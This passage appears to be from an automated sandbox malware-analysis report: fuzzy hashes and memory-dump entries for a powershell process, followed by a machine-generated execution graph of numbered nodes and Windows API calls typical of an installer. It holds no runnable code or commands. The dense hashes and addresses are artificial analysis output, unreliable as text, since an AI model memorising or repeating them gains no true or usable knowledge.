                                                                                                                                                                            • Opcode Fuzzy Hash: 751d414c2864e6f9eee219977a1e98039b4973dae113b9042b7e47525a721e4b
                                                                                                                                                                            • Instruction Fuzzy Hash: ECB18174E006099FDB54DFA9D990A9DFBF2FF88304F108629E419AB315EB70A945CF90
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000017.00000002.2622293718.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_23_2_70a0000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: $^q$$^q$$^q$$^q
                                                                                                                                                                            • API String ID: 0-2125118731
                                                                                                                                                                            • Opcode ID: a1851e5f56d7018bbe99d4a9f351200389c4f26288fd7d115213d4d608fdc71d
                                                                                                                                                                            • Instruction ID: 7086b9932f2a05204e1b3772d138816793248faa71e8c588931f580243484133
                                                                                                                                                                            • Opcode Fuzzy Hash: a1851e5f56d7018bbe99d4a9f351200389c4f26288fd7d115213d4d608fdc71d
                                                                                                                                                                            • Instruction Fuzzy Hash: A0216B71700306BBDB7895AA9C00B2BB7DA7FC0710F24852AA506EF385DD36C8548361
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000017.00000002.2622293718.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_23_2_70a0000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                                                                                            • API String ID: 0-2049395529
                                                                                                                                                                            • Opcode ID: 4ce5db1a69aea91406e91615e54578d87d885e976c34cb4ae71dfd78637da97e
                                                                                                                                                                            • Instruction ID: 57770b7c138e17529916f115981c5658ad66bfb20b25fc44becd0bfae231421f
                                                                                                                                                                            • Opcode Fuzzy Hash: 4ce5db1a69aea91406e91615e54578d87d885e976c34cb4ae71dfd78637da97e
                                                                                                                                                                            • Instruction Fuzzy Hash: 01018421B0D3CA6FC72B12781C205666FBA5F83610B1E42DBD041CF25BDD554C4983A3

                                                                                                                                                                            Execution Graph

                                                                                                                                                                            Execution Coverage:16.2%
                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                            Signature Coverage:0%
                                                                                                                                                                            Total number of Nodes:1380
                                                                                                                                                                            Total number of Limit Nodes:23
                                                                                                                                                                            execution_graph 3249 401bc0 3250 401c11 3249->3250 3251 401bcd 3249->3251 3252 401c16 3250->3252 3253 401c3b GlobalAlloc 3250->3253 3254 4023af 3251->3254 3259 401be4 3251->3259 3262 401c56 3252->3262 3268 4066a2 lstrcpynW 3252->3268 3269 4066df 3253->3269 3256 4066df 21 API calls 3254->3256 3258 4023bc 3256->3258 3288 405d02 3258->3288 3286 4066a2 lstrcpynW 3259->3286 3260 401c28 GlobalFree 3260->3262 3264 401bf3 3287 4066a2 lstrcpynW 3264->3287 3266 401c02 3292 4066a2 lstrcpynW 3266->3292 3268->3260 3270 4066ea 3269->3270 3271 406931 3270->3271 3274 406902 lstrlenW 3270->3274 3277 4067fb GetSystemDirectoryW 3270->3277 3278 4066df 15 API calls 3270->3278 3280 406811 GetWindowsDirectoryW 3270->3280 3281 4066df 15 API calls 3270->3281 3282 4068a3 lstrcatW 3270->3282 3285 406873 SHGetPathFromIDListW CoTaskMemFree 3270->3285 3293 406570 3270->3293 3298 406a96 GetModuleHandleA 3270->3298 3304 406950 3270->3304 3313 4065e9 wsprintfW 3270->3313 3314 4066a2 lstrcpynW 3270->3314 3272 40694a 3271->3272 3315 4066a2 lstrcpynW 3271->3315 3272->3262 3274->3270 3277->3270 3278->3274 3280->3270 3281->3270 3282->3270 3285->3270 3286->3264 3287->3266 3289 405d17 3288->3289 3290 405d63 3289->3290 3291 405d2b MessageBoxIndirectW 3289->3291 3290->3262 3291->3290 3292->3262 3316 40650f 3293->3316 3296 4065a4 RegQueryValueExW RegCloseKey 3297 4065d4 3296->3297 3297->3270 3299 406ab2 3298->3299 3300 406abc GetProcAddress 3298->3300 3320 406a26 GetSystemDirectoryW 3299->3320 3303 406acb 3300->3303 3302 406ab8 3302->3300 3302->3303 3303->3270 3311 40695d 3304->3311 3305 4069d3 3306 4069d8 CharPrevW 3305->3306 3309 4069f9 3305->3309 3306->3305 3307 4069c6 CharNextW 3307->3305 3307->3311 3309->3270 3310 4069b2 CharNextW 3310->3311 3311->3305 3311->3307 3311->3310 3312 4069c1 CharNextW 3311->3312 3323 405f9e 3311->3323 3312->3307 3313->3270 3314->3270 3315->3272 3317 40651e 3316->3317 3318 406522 3317->3318 3319 406527 RegOpenKeyExW 3317->3319 3318->3296 3318->3297 3319->3318 3321 406a48 wsprintfW LoadLibraryExW 3320->3321 3321->3302 3324 405fa4 3323->3324 3325 405fba 3324->3325 3326 405fab CharNextW 3324->3326 3325->3311 3326->3324 3928 406dc0 3930 406c44 3928->3930 3929 4075af 3930->3929 3931 406cc5 GlobalFree 3930->3931 3932 406cce GlobalAlloc 3930->3932 3933 406d45 GlobalAlloc 3930->3933 3934 406d3c GlobalFree 3930->3934 3931->3932 3932->3929 3932->3930 3933->3929 3933->3930 3934->3933 3935 402641 3936 402dcb 21 API calls 3935->3936 3937 402648 3936->3937 3940 406192 GetFileAttributesW CreateFileW 3937->3940 3939 402654 3940->3939 3941 4025c3 3942 402e0b 21 API calls 3941->3942 3943 4025cd 3942->3943 3951 402da9 3943->3951 3945 4025d6 3946 4025f2 RegEnumKeyW 3945->3946 3947 4025fe RegEnumValueW 3945->3947 3948 402953 3945->3948 3949 402613 RegCloseKey 3946->3949 3947->3949 3949->3948 3952 4066df 21 API calls 3951->3952 3953 402dbe 3952->3953 3953->3945 3954 4015c8 3955 402dcb 21 API calls 3954->3955 3956 4015cf SetFileAttributesW 3955->3956 3957 4015e1 3956->3957 3860 401fc9 3861 402dcb 21 API calls 3860->3861 3862 401fcf 3861->3862 3863 405727 28 API calls 3862->3863 3864 401fd9 3863->3864 3865 405c85 2 API calls 3864->3865 3866 401fdf 3865->3866 3867 402002 CloseHandle 3866->3867 3870 402953 3866->3870 3875 406b41 WaitForSingleObject 3866->3875 3867->3870 3871 401ff4 3872 402004 3871->3872 3873 401ff9 3871->3873 3872->3867 3880 4065e9 wsprintfW 3873->3880 3876 406b5b 3875->3876 3877 406b6d GetExitCodeProcess 3876->3877 3878 406ad2 2 API calls 3876->3878 3877->3871 3879 406b62 WaitForSingleObject 3878->3879 3879->3876 3880->3867 3965 404acb 3966 404b01 3965->3966 3967 404adb 3965->3967 3975 404688 3966->3975 3972 404621 3967->3972 3970 404ae8 SetDlgItemTextW 3970->3966 3973 4066df 21 API calls 3972->3973 3974 40462c SetDlgItemTextW 3973->3974 3974->3970 3976 4046a0 GetWindowLongW 3975->3976 3977 40474b 3975->3977 3976->3977 3978 4046b5 3976->3978 3978->3977 3979 4046e2 GetSysColor 3978->3979 3980 4046e5 3978->3980 3979->3980 3981 4046f5 SetBkMode 3980->3981 3982 4046eb SetTextColor 3980->3982 3983 404713 3981->3983 3984 40470d GetSysColor 3981->3984 3982->3981 3985 404724 3983->3985 3986 40471a SetBkColor 3983->3986 3984->3983 3985->3977 3987 404737 DeleteObject 3985->3987 3988 40473e CreateBrushIndirect 3985->3988 3986->3985 3987->3988 3988->3977 3911 40254f 3922 402e0b 3911->3922 3914 402dcb 21 API calls 3915 402562 3914->3915 3916 40256d RegQueryValueExW 3915->3916 3918 402953 3915->3918 3917 40258d 3916->3917 3921 402593 RegCloseKey 3916->3921 3917->3921 3927 4065e9 wsprintfW 3917->3927 3921->3918 3923 402dcb 21 API calls 3922->3923 3924 402e22 3923->3924 3925 40650f RegOpenKeyExW 3924->3925 3926 402559 3925->3926 3926->3914 3927->3921 3992 40204f 3993 402dcb 21 API calls 3992->3993 3994 402056 3993->3994 3995 406a96 5 API calls 3994->3995 3996 402065 3995->3996 3997 402081 GlobalAlloc 3996->3997 3999 4020f1 3996->3999 3998 402095 3997->3998 3997->3999 4000 406a96 5 API calls 3998->4000 4001 40209c 4000->4001 4002 406a96 5 API calls 4001->4002 4003 4020a6 4002->4003 4003->3999 4007 4065e9 wsprintfW 4003->4007 4005 4020df 4008 4065e9 wsprintfW 4005->4008 4007->4005 4008->3999 4009 4021cf 4010 402dcb 21 API calls 4009->4010 4011 4021d6 4010->4011 4012 402dcb 21 API calls 4011->4012 4013 4021e0 4012->4013 4014 402dcb 21 API calls 4013->4014 4015 4021ea 4014->4015 4016 402dcb 21 API calls 4015->4016 4017 4021f4 4016->4017 4018 402dcb 21 API calls 4017->4018 4019 4021fe 4018->4019 4020 40223d CoCreateInstance 4019->4020 4021 402dcb 21 API calls 4019->4021 4024 40225c 4020->4024 4021->4020 4022 401423 28 API calls 4023 40231b 4022->4023 4024->4022 4024->4023 4025 401a55 4026 402dcb 21 API calls 4025->4026 4027 401a5e ExpandEnvironmentStringsW 4026->4027 4028 401a72 4027->4028 4030 401a85 4027->4030 4029 401a77 lstrcmpW 4028->4029 4028->4030 4029->4030 4031 404757 lstrcpynW lstrlenW 4032 4014d7 4033 402da9 21 API calls 4032->4033 4034 4014dd Sleep 4033->4034 4036 402c4f 4034->4036 4042 4023d7 4043 4023e5 4042->4043 4044 4023df 4042->4044 4046 4023f3 4043->4046 4047 402dcb 21 API calls 4043->4047 4045 402dcb 21 API calls 4044->4045 4045->4043 4048 402dcb 21 API calls 4046->4048 4050 402401 4046->4050 4047->4046 4048->4050 4049 402dcb 21 API calls 4051 40240a WritePrivateProfileStringW 4049->4051 4050->4049 4052 402459 4053 402461 4052->4053 4054 40248c 4052->4054 4056 402e0b 21 API calls 4053->4056 4055 402dcb 21 API calls 4054->4055 4057 402493 4055->4057 4058 402468 4056->4058 4063 402e89 4057->4063 4060 4024a0 4058->4060 4061 402dcb 21 API calls 4058->4061 4062 402479 RegDeleteValueW RegCloseKey 4061->4062 4062->4060 4064 402e9d 4063->4064 4065 402e96 4063->4065 4064->4065 4067 402ece 4064->4067 4065->4060 4068 40650f RegOpenKeyExW 4067->4068 4069 402efc 4068->4069 4070 402f0c RegEnumValueW 4069->4070 4077 402f2f 4069->4077 4078 402fa6 4069->4078 4071 402f96 RegCloseKey 4070->4071 4070->4077 4071->4078 4072 402f6b RegEnumKeyW 4073 402f74 RegCloseKey 4072->4073 4072->4077 4074 406a96 5 API calls 4073->4074 4076 402f84 4074->4076 4075 402ece 6 API calls 4075->4077 4076->4078 4079 402f88 RegDeleteKeyW 4076->4079 4077->4071 4077->4072 4077->4073 4077->4075 4078->4065 4079->4078 4080 40175a 4081 402dcb 21 API calls 4080->4081 4082 401761 SearchPathW 4081->4082 4083 40177c 4082->4083 4084 401d5d 4085 402da9 21 API calls 4084->4085 4086 401d64 4085->4086 4087 402da9 21 API calls 4086->4087 4088 401d70 GetDlgItem 4087->4088 4089 40265d 4088->4089 4097 4047e0 4099 404912 4097->4099 4101 4047f8 4097->4101 4098 40497c 4100 404a46 4098->4100 4102 404986 GetDlgItem 4098->4102 4099->4098 4099->4100 4106 40494d GetDlgItem SendMessageW 4099->4106 4108 404688 8 API calls 4100->4108 4103 404621 22 API calls 4101->4103 4104 4049a0 4102->4104 4105 404a07 4102->4105 4107 40485f 4103->4107 4104->4105 4113 4049c6 SendMessageW LoadCursorW SetCursor 4104->4113 4105->4100 4109 404a19 4105->4109 4130 404643 EnableWindow 4106->4130 4111 404621 22 API calls 4107->4111 4112 404a41 4108->4112 4114 404a2f 4109->4114 4115 404a1f SendMessageW 4109->4115 4117 40486c CheckDlgButton 4111->4117 4134 404a8f 4113->4134 4114->4112 4119 404a35 SendMessageW 4114->4119 4115->4114 4116 404977 4131 404a6b 4116->4131 4128 404643 EnableWindow 4117->4128 4119->4112 4123 40488a GetDlgItem 4129 404656 SendMessageW 4123->4129 4125 4048a0 SendMessageW 4126 4048c6 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4125->4126 4127 4048bd GetSysColor 4125->4127 4126->4112 4127->4126 4128->4123 4129->4125 4130->4116 4132 404a79 4131->4132 4133 404a7e SendMessageW 4131->4133 4132->4133 4133->4098 4137 405cc8 ShellExecuteExW 4134->4137 4136 4049f5 LoadCursorW SetCursor 4136->4105 4137->4136 4138 402663 4139 402692 4138->4139 4140 402677 4138->4140 4142 4026c2 4139->4142 4143 402697 4139->4143 4141 402da9 21 API calls 4140->4141 4153 40267e 4141->4153 4145 402dcb 21 API calls 4142->4145 4144 402dcb 21 API calls 4143->4144 4146 40269e 4144->4146 4147 4026c9 lstrlenW 4145->4147 4155 4066c4 WideCharToMultiByte 4146->4155 4147->4153 4149 4026b2 lstrlenA 4149->4153 4150 40270c 4151 4026f6 4151->4150 4152 406244 WriteFile 4151->4152 4152->4150 4153->4150 4153->4151 4156 406273 SetFilePointer 4153->4156 4155->4149 4157 40628f 4156->4157 4164 4062a7 4156->4164 4158 406215 ReadFile 4157->4158 4159 40629b 4158->4159 4160 4062b0 SetFilePointer 4159->4160 4161 4062d8 SetFilePointer 4159->4161 4159->4164 4160->4161 4162 4062bb 4160->4162 4161->4164 4163 406244 WriteFile 4162->4163 4163->4164 4164->4151 3591 403665 SetErrorMode GetVersionExW 3592 4036f1 3591->3592 3593 4036b9 GetVersionExW 3591->3593 3594 403748 3592->3594 3595 406a96 5 API calls 3592->3595 3593->3592 3596 406a26 3 API calls 3594->3596 3595->3594 3597 40375e lstrlenA 3596->3597 3597->3594 3598 40376e 3597->3598 3599 406a96 5 API calls 3598->3599 3600 403775 3599->3600 3601 406a96 5 API calls 3600->3601 3602 40377c 3601->3602 3603 406a96 5 API calls 3602->3603 3604 403788 #17 OleInitialize SHGetFileInfoW 3603->3604 3679 4066a2 lstrcpynW 3604->3679 3607 4037d7 GetCommandLineW 3680 4066a2 lstrcpynW 3607->3680 3609 4037e9 3610 405f9e CharNextW 3609->3610 3611 40380f CharNextW 3610->3611 3621 403821 3611->3621 3612 403923 3613 403937 GetTempPathW 3612->3613 3681 403634 3613->3681 3615 40394f 3616 403953 GetWindowsDirectoryW lstrcatW 3615->3616 3617 4039a9 DeleteFileW 3615->3617 3619 403634 12 API calls 3616->3619 3691 4030f5 GetTickCount GetModuleFileNameW 3617->3691 3618 405f9e CharNextW 3618->3621 3622 40396f 3619->3622 3621->3612 3621->3618 3625 403925 3621->3625 3622->3617 3624 403973 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3622->3624 3623 4039bd 3626 403bb0 ExitProcess CoUninitialize 3623->3626 3633 405f9e CharNextW 3623->3633 3662 403a64 3623->3662 3627 403634 12 API calls 3624->3627 3778 4066a2 lstrcpynW 3625->3778 3628 403bc2 3626->3628 3629 403be6 3626->3629 3631 4039a1 3627->3631 3632 405d02 MessageBoxIndirectW 3628->3632 3634 403c6a ExitProcess 3629->3634 3635 403bee GetCurrentProcess OpenProcessToken 3629->3635 3631->3617 3631->3626 3638 403bd0 ExitProcess 3632->3638 3643 4039dc 3633->3643 3639 403c06 LookupPrivilegeValueW AdjustTokenPrivileges 3635->3639 3640 403c3a 3635->3640 3639->3640 3642 406a96 5 API calls 3640->3642 3653 403c41 3642->3653 3644 403a3a 3643->3644 3645 403a7d 3643->3645 3648 406079 18 API calls 3644->3648 3781 405c6d 3645->3781 3647 403c56 ExitWindowsEx 3647->3634 3650 403c63 3647->3650 3651 403a46 3648->3651 3795 40140b 3650->3795 3651->3626 3779 4066a2 lstrcpynW 3651->3779 3653->3647 3653->3650 3655 403a9c 3657 403ab4 3655->3657 3785 4066a2 lstrcpynW 3655->3785 3661 403ada wsprintfW 3657->3661 3676 403b06 3657->3676 3658 403a59 3780 4066a2 lstrcpynW 3658->3780 3663 4066df 21 API calls 3661->3663 3721 403d74 3662->3721 3663->3657 3666 403b50 SetCurrentDirectoryW 3669 406462 40 API calls 3666->3669 3667 403b16 GetFileAttributesW 3668 403b22 DeleteFileW 3667->3668 3667->3676 3668->3676 3671 403b5f CopyFileW 3669->3671 3670 403b4e 3670->3626 3671->3670 3671->3676 3672 405dae 71 API calls 3672->3676 3673 406462 40 API calls 3673->3676 3674 4066df 21 API calls 3674->3676 3676->3657 3676->3661 3676->3666 3676->3667 3676->3670 3676->3672 3676->3673 3676->3674 3677 403bd8 CloseHandle 3676->3677 3678 4069ff 2 API calls 3676->3678 3786 405bf6 CreateDirectoryW 3676->3786 3789 405c50 CreateDirectoryW 3676->3789 3792 405c85 CreateProcessW 3676->3792 3677->3670 3678->3676 3679->3607 3680->3609 3682 406950 5 API calls 3681->3682 3684 403640 3682->3684 3683 40364a 3683->3615 3684->3683 3685 405f71 3 API calls 3684->3685 3686 403652 3685->3686 3687 405c50 2 API calls 3686->3687 3688 403658 3687->3688 3689 4061c1 2 API calls 3688->3689 3690 403663 3689->3690 3690->3615 3798 406192 GetFileAttributesW CreateFileW 3691->3798 3693 403138 3720 403145 3693->3720 3799 4066a2 lstrcpynW 3693->3799 3695 40315b 3696 405fbd 2 API calls 3695->3696 3697 403161 3696->3697 3800 4066a2 lstrcpynW 3697->3800 3699 40316c GetFileSize 3700 403266 3699->3700 3719 403183 3699->3719 3701 403053 36 API calls 3700->3701 3702 40326f 3701->3702 3704 4032ab GlobalAlloc 3702->3704 3702->3720 3802 40361d SetFilePointer 3702->3802 3703 403607 ReadFile 3703->3719 3706 4032c2 3704->3706 3705 403303 3708 403053 36 API calls 3705->3708 3710 4061c1 2 API calls 3706->3710 3708->3720 3709 40328c 3711 403607 ReadFile 3709->3711 3714 4032d3 CreateFileW 3710->3714 3713 403297 3711->3713 3712 403053 36 API calls 3712->3719 3713->3704 3713->3720 3715 40330d 3714->3715 3714->3720 3801 40361d SetFilePointer 3715->3801 3717 40331b 3718 403396 48 API calls 3717->3718 3718->3720 3719->3700 3719->3703 3719->3705 3719->3712 3719->3720 3720->3623 3722 406a96 5 API calls 3721->3722 3723 403d88 3722->3723 3724 403da0 3723->3724 3725 403d8e 3723->3725 3726 406570 3 API calls 3724->3726 3811 4065e9 wsprintfW 3725->3811 3727 403dd0 3726->3727 3729 403def lstrcatW 3727->3729 3731 406570 3 API calls 3727->3731 3730 403d9e 3729->3730 3803 40404a 3730->3803 3731->3729 3734 406079 18 API calls 3735 403e21 3734->3735 3736 403eb5 3735->3736 3738 406570 3 API calls 3735->3738 3737 406079 18 API calls 3736->3737 3739 403ebb 3737->3739 3745 403e53 3738->3745 3740 403ecb LoadImageW 3739->3740 3741 4066df 21 API calls 3739->3741 3742 403f71 3740->3742 3743 403ef2 RegisterClassW 3740->3743 3741->3740 3747 40140b 2 API calls 3742->3747 3746 403f28 SystemParametersInfoW CreateWindowExW 3743->3746 3776 403a74 3743->3776 3744 403e74 lstrlenW 3749 403e82 lstrcmpiW 3744->3749 3750 403ea8 3744->3750 3745->3736 3745->3744 3748 405f9e CharNextW 3745->3748 3746->3742 3751 403f77 3747->3751 3753 403e71 3748->3753 3749->3750 3754 403e92 GetFileAttributesW 3749->3754 3752 405f71 3 API calls 3750->3752 3755 40404a 22 API calls 3751->3755 3751->3776 3756 403eae 3752->3756 3753->3744 3757 403e9e 3754->3757 3759 403f88 3755->3759 3812 4066a2 lstrcpynW 3756->3812 3757->3750 3758 405fbd 2 API calls 3757->3758 3758->3750 3761 403f94 ShowWindow 3759->3761 3762 404017 3759->3762 3764 406a26 3 API calls 3761->3764 3813 4057fa OleInitialize 3762->3813 3766 403fac 3764->3766 3765 40401d 3767 404021 3765->3767 3768 404039 3765->3768 3769 403fba GetClassInfoW 3766->3769 3771 406a26 3 API calls 3766->3771 3774 40140b 2 API calls 3767->3774 3767->3776 3770 40140b 2 API calls 3768->3770 3772 403fe4 DialogBoxParamW 3769->3772 3773 403fce GetClassInfoW RegisterClassW 3769->3773 3770->3776 3771->3769 3775 40140b 2 API calls 3772->3775 3773->3772 3774->3776 3777 40400c 3775->3777 3776->3626 3777->3776 3778->3613 3779->3658 3780->3662 3782 406a96 5 API calls 3781->3782 3783 403a82 lstrlenW 3782->3783 3784 4066a2 lstrcpynW 3783->3784 3784->3655 3785->3657 3787 405c42 3786->3787 3788 405c46 GetLastError 3786->3788 3787->3676 3788->3787 3790 405c60 3789->3790 3791 405c64 GetLastError 3789->3791 3790->3676 3791->3790 3793 405cc4 3792->3793 3794 405cb8 CloseHandle 3792->3794 3793->3676 3794->3793 3796 401389 2 API calls 3795->3796 3797 401420 3796->3797 3797->3634 3798->3693 3799->3695 3800->3699 3801->3717 3802->3709 3804 40405e 3803->3804 3820 4065e9 wsprintfW 3804->3820 3806 4040cf 3821 404103 3806->3821 3808 403dff 3808->3734 3809 4040d4 3809->3808 3810 4066df 21 API calls 3809->3810 3810->3809 3811->3730 3812->3736 3824 40466d 3813->3824 3815 40581d 3819 405844 3815->3819 3827 401389 3815->3827 3816 40466d SendMessageW 3817 405856 OleUninitialize 3816->3817 3817->3765 3819->3816 3820->3806 3822 4066df 21 API calls 3821->3822 3823 404111 SetWindowTextW 3822->3823 3823->3809 3825 404685 3824->3825 3826 404676 SendMessageW 3824->3826 3825->3815 3826->3825 3829 401390 3827->3829 3828 4013fe 3828->3815 3829->3828 3830 4013cb MulDiv SendMessageW 3829->3830 3830->3829 3831 4015e6 3832 402dcb 21 API calls 3831->3832 3833 4015ed 3832->3833 3834 40601c 4 API calls 3833->3834 3835 4015f6 3834->3835 3836 401656 3835->3836 3837 405f9e CharNextW 3835->3837 3844 405c50 2 API calls 3835->3844 3845 405c6d 5 API calls 3835->3845 3848 40163c GetFileAttributesW 3835->3848 3849 405bf6 2 API calls 3835->3849 3838 401688 3836->3838 3839 40165b 3836->3839 3837->3835 3841 401423 28 API calls 3838->3841 3850 401423 3839->3850 3847 401680 3841->3847 3844->3835 3845->3835 3846 40166f SetCurrentDirectoryW 3846->3847 3848->3835 3849->3835 3851 405727 28 API calls 3850->3851 3852 401431 3851->3852 3853 4066a2 lstrcpynW 3852->3853 3853->3846 4165 405866 4166 405a10 4165->4166 4167 405887 GetDlgItem GetDlgItem GetDlgItem 4165->4167 4169 405a41 4166->4169 4170 405a19 GetDlgItem CreateThread CloseHandle 4166->4170 4210 404656 SendMessageW 4167->4210 4172 405a6c 4169->4172 4174 405a91 4169->4174 4175 405a58 ShowWindow ShowWindow 4169->4175 4170->4169 4171 4058f7 4179 4058fe GetClientRect GetSystemMetrics SendMessageW SendMessageW 4171->4179 4173 405acc 4172->4173 4176 405a80 4172->4176 4177 405aa6 ShowWindow 4172->4177 4173->4174 4187 405ada SendMessageW 4173->4187 4178 404688 8 API calls 4174->4178 4212 404656 SendMessageW 4175->4212 4213 4045fa 4176->4213 4183 405ac6 4177->4183 4184 405ab8 4177->4184 4182 405a9f 4178->4182 4185 405950 SendMessageW SendMessageW 4179->4185 4186 40596c 4179->4186 4189 4045fa SendMessageW 4183->4189 4188 405727 28 API calls 4184->4188 4185->4186 4190 405971 SendMessageW 4186->4190 4191 40597f 4186->4191 4187->4182 4192 405af3 CreatePopupMenu 4187->4192 4188->4183 4189->4173 4190->4191 4194 404621 22 API calls 4191->4194 4193 4066df 21 API calls 4192->4193 4195 405b03 AppendMenuW 4193->4195 4196 40598f 4194->4196 4197 405b20 GetWindowRect 4195->4197 4198 405b33 TrackPopupMenu 4195->4198 4199 405998 ShowWindow 4196->4199 4200 4059cc GetDlgItem SendMessageW 4196->4200 4197->4198 4198->4182 4201 405b4e 4198->4201 4202 4059bb 4199->4202 4203 4059ae ShowWindow 4199->4203 4200->4182 4204 4059f3 SendMessageW SendMessageW 4200->4204 4205 405b6a SendMessageW 4201->4205 4211 404656 SendMessageW 4202->4211 4203->4202 4204->4182 4205->4205 4206 405b87 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4205->4206 4208 405bac SendMessageW 4206->4208 4208->4208 4209 405bd5 GlobalUnlock SetClipboardData CloseClipboard 4208->4209 4209->4182 4210->4171 4211->4200 4212->4172 4214 404601 4213->4214 4215 404607 SendMessageW 4213->4215 4214->4215 4215->4174 4216 404e68 4217 404e94 4216->4217 4218 404e78 4216->4218 4220 404ec7 4217->4220 4221 404e9a SHGetPathFromIDListW 4217->4221 4227 405ce6 GetDlgItemTextW 4218->4227 4223 404eb1 SendMessageW 4221->4223 4224 404eaa 4221->4224 4222 404e85 SendMessageW 4222->4217 4223->4220 4225 40140b 2 API calls 4224->4225 4225->4223 4227->4222 4228 401c68 4229 402da9 21 API calls 4228->4229 4230 401c6f 4229->4230 4231 402da9 21 API calls 4230->4231 4232 401c7c 4231->4232 4233 401c91 4232->4233 4234 402dcb 21 API calls 4232->4234 4235 401ca1 4233->4235 4236 402dcb 21 API calls 4233->4236 4234->4233 4237 401cf8 4235->4237 4238 401cac 4235->4238 4236->4235 4239 402dcb 21 API calls 4237->4239 4240 402da9 21 API calls 4238->4240 4241 401cfd 4239->4241 4242 401cb1 4240->4242 4243 402dcb 21 API calls 4241->4243 4244 402da9 21 API calls 4242->4244 4245 401d06 FindWindowExW 4243->4245 4246 401cbd 4244->4246 4249 401d28 4245->4249 4247 401ce8 SendMessageW 4246->4247 4248 401cca SendMessageTimeoutW 4246->4248 4247->4249 4248->4249 4250 4028e9 4251 4028ef 4250->4251 4252 4028f7 FindClose 4251->4252 4253 402c4f 4251->4253 4252->4253 4254 4016f1 4255 402dcb 21 API calls 4254->4255 4256 4016f7 GetFullPathNameW 4255->4256 4257 401711 4256->4257 4263 401733 4256->4263 4260 4069ff 2 API calls 4257->4260 4257->4263 4258 401748 GetShortPathNameW 4259 402c4f 4258->4259 4261 401723 4260->4261 4261->4263 4264 4066a2 lstrcpynW 4261->4264 4263->4258 4263->4259 4264->4263 4265 401e73 GetDC 4266 402da9 21 API calls 4265->4266 4267 401e85 GetDeviceCaps MulDiv ReleaseDC 4266->4267 4268 402da9 21 API calls 4267->4268 4269 401eb6 4268->4269 4270 4066df 21 API calls 4269->4270 4271 401ef3 CreateFontIndirectW 4270->4271 4272 40265d 4271->4272 4273 402975 4274 402dcb 21 API calls 4273->4274 4275 402981 4274->4275 4276 402997 4275->4276 4277 402dcb 21 API calls 4275->4277 4278 40616d 2 API calls 4276->4278 4277->4276 4279 40299d 4278->4279 4301 406192 GetFileAttributesW CreateFileW 4279->4301 4281 4029aa 4282 402a60 4281->4282 4283 4029c5 GlobalAlloc 4281->4283 4284 402a48 4281->4284 4285 402a67 DeleteFileW 4282->4285 4286 402a7a 4282->4286 4283->4284 4287 4029de 4283->4287 4288 403396 48 API calls 4284->4288 4285->4286 4302 40361d SetFilePointer 4287->4302 4290 402a55 CloseHandle 4288->4290 4290->4282 4291 4029e4 4292 403607 ReadFile 4291->4292 4293 4029ed GlobalAlloc 4292->4293 4294 402a31 4293->4294 4295 4029fd 4293->4295 4296 406244 WriteFile 4294->4296 4297 403396 48 API calls 4295->4297 4298 402a3d GlobalFree 4296->4298 4300 402a0a 4297->4300 4298->4284 4299 402a28 GlobalFree 4299->4294 4300->4299 4301->4281 4302->4291 4303 4014f5 SetForegroundWindow 4304 402c4f 4303->4304 4319 40197b 4320 402dcb 21 API calls 4319->4320 4321 401982 lstrlenW 4320->4321 4322 40265d 4321->4322 3885 4020fd 3886 4021c1 3885->3886 3887 40210f 3885->3887 3889 401423 28 API calls 3886->3889 3888 402dcb 21 API calls 3887->3888 3890 402116 3888->3890 3895 40231b 3889->3895 3891 402dcb 21 API calls 3890->3891 3892 40211f 3891->3892 3893 402135 LoadLibraryExW 3892->3893 3894 402127 GetModuleHandleW 3892->3894 3893->3886 3896 402146 3893->3896 3894->3893 3894->3896 3905 406b05 3896->3905 3899 402190 3900 405727 28 API calls 3899->3900 3902 402167 3900->3902 3901 402157 3901->3902 3903 401423 28 API calls 3901->3903 3902->3895 3904 4021b3 FreeLibrary 3902->3904 3903->3902 3904->3895 3910 4066c4 WideCharToMultiByte 3905->3910 3907 406b22 3908 406b29 GetProcAddress 3907->3908 3909 402151 3907->3909 3908->3909 3909->3899 3909->3901 3910->3907 4330 402b7e 4331 402bd0 4330->4331 4332 402b85 4330->4332 4333 406a96 5 API calls 4331->4333 4335 402da9 21 API calls 4332->4335 4336 402bce 4332->4336 4334 402bd7 4333->4334 4337 402dcb 21 API calls 4334->4337 4338 402b93 4335->4338 4339 402be0 4337->4339 4340 402da9 21 API calls 4338->4340 4339->4336 4341 402be4 IIDFromString 4339->4341 4343 402b9f 4340->4343 4341->4336 4342 402bf3 4341->4342 4342->4336 4348 4066a2 lstrcpynW 4342->4348 4347 4065e9 wsprintfW 4343->4347 4345 402c10 CoTaskMemFree 4345->4336 4347->4336 4348->4345 4349 401000 4350 401037 BeginPaint GetClientRect 4349->4350 4351 40100c DefWindowProcW 4349->4351 4353 4010f3 4350->4353 4354 401179 4351->4354 4355 401073 CreateBrushIndirect FillRect DeleteObject 4353->4355 4356 4010fc 4353->4356 4355->4353 4357 401102 CreateFontIndirectW 4356->4357 4358 401167 EndPaint 4356->4358 4357->4358 4359 401112 6 API calls 4357->4359 4358->4354 4359->4358 4360 402a80 4361 402da9 21 API calls 4360->4361 4362 402a86 4361->4362 4363 402ac9 4362->4363 4364 402aad 4362->4364 4368 402953 4362->4368 4366 402ae3 4363->4366 4367 402ad3 4363->4367 4365 402ab2 4364->4365 4373 402ac3 4364->4373 4374 4066a2 lstrcpynW 4365->4374 4370 4066df 21 API calls 4366->4370 4369 402da9 21 API calls 4367->4369 4369->4373 4370->4373 4373->4368 4375 4065e9 wsprintfW 4373->4375 4374->4368 4375->4368 3327 401781 3333 402dcb 